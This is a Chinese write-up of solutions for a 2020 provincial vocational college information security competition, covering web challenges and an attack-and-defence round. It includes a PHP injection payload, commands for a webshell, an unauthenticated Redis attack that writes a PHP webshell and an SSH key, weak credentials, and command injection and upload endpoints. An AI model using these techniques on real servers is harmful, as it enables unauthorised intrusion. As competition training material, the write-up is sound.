2020福建省职业院校技能大赛信息安全管理与评估WP

第二阶段

任务一

第一题: ?dcn=);show_source("flag.php");//

image-20191225101121638

第二题:输入密码查看flag 密码是:13546

image-20191225101203707

第三题:修改前端输入框大小

image-20191225101321020

第四题:burp抓包--res模块重放

image-20191225101340831

第五题:wireshark 第242包追中http流 读取flag到burp解密

image-20191225101405588

image-20191225101414921

任务二

页面有的东西 backup xiuno.com 还有一个登陆框

image-20191225213540539

  • url地址后加上.backup.zip 下载备份文件 共有12个目录
    • html/route/404.php 一句话木马
      • html/route/404.php post写get=phpinfo(); 查看php版本为5.4.45
    • html/route/404.php post写get=system(tree); 回显flag
    • 访问phpmyadmin,首页有密码提示(网站、phpmyadmin源码)登陆后在用户名密码框得flag

任务三

靶机开放22,8091端口 利用文件包含

第三阶段:AWD

弱密码
  • root dcndcndcn
  • dcn dcn
  • mysql数据库 root Dcnflag.123
33137端口 ssh任意密码登陆
redis 3.2.11版本
  • 网站写码连接
    • ./redis-cli -h x.x.x.x
    • 进入后用config set dir /var/www/html
    • config set dbfilename a.php 木马文件名
    • set a.php ""
    • save
    • 直接浏览器访问http://x.x.x.x/a.php?pass=system("cat /flag");
  • 写入ssh公钥实现ssh登陆
    • 先在本地kali生成 ssh-keygen -t rsa cd /root/.ssh/
    • 将公钥写入key.txt (echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt
    • 然后把key.txt吸入redis缓存 cat /root/.ssh/key.txt |./redis-cli -h x.x.x.x -x set pub

web

/admin/include.php?file get 文件包含 显示可能在源代码中

/admin/magic_box/command.php?IP requests 命令执行

/admin/magic_box/low.php?IP 命令执行 &&连接 | & 连接

/admin/fileupload.php 文件上传php文件 上传后文件在/images/

image-20191225120210930

posted @ 2022-06-13 10:08  Rlins  阅读(171)  评论(0)    收藏  举报